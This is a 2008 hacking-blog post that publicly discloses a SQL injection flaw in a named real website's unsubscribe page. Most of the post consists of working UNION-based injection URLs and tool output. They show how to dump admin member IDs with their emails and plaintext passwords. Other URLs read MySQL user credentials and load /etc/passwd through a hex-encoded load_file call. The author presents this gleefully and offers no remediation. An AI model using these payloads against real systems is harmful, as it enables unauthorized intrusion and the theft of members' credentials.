viperfx07 blog (hack + crack + web + app)

viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Sunday, November 23, 2008

[SQLi] http://www.faniq.com

6:03 PM Posted by viperfx07 No comments
Intro: it was funny. I found this vulnerability when i was about to unsubscribe, and voila, it was vulnerable. The password is not encrypted, so there is a chance that we can access members' email that has the password as they entered when they were registering.

PoC : http://www.faniq.com/unsubscribe.php?invite_id=[SQLi]
Demo: http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,user(),database(),version())--

Tools: schemafuzz.py v5.0
Admin page: http://www.faniq.com/admin/
Admin usr/pwd query:
- step 1 (get the member id with admin privilege): http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,member_id,admin)+from+member_privs+where+admin=char(0x59)--

- step 2 (get email & password with member_id in step 1): http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,member_id,email,password)+from+member+where+member_id=char(0x3134)--

Screenshot of admin page:


Database info:
[+] URL:http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 17:40:49
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: FANIQ
User: sport@10.10.11.135
Version: 5.0.45-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t [!] http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat(user,0x3a,password)+FROM+mysql.user-- [+] Do we have Access to Load_File: Yes <-- w00t w00t [!] http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764)-- [-] [17:40:58] [-] Total URL Requests 3 [-] Done

[+] URL:http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 17:41:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: FANIQ
User: sport@10.10.11.135
Version: 5.0.45-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 4

[0]FANIQ
[1]STATS
[2]mysql
[3]test

[-] [17:41:26]
[-] Total URL Requests 6
[-] Done

0 comments:

Post a Comment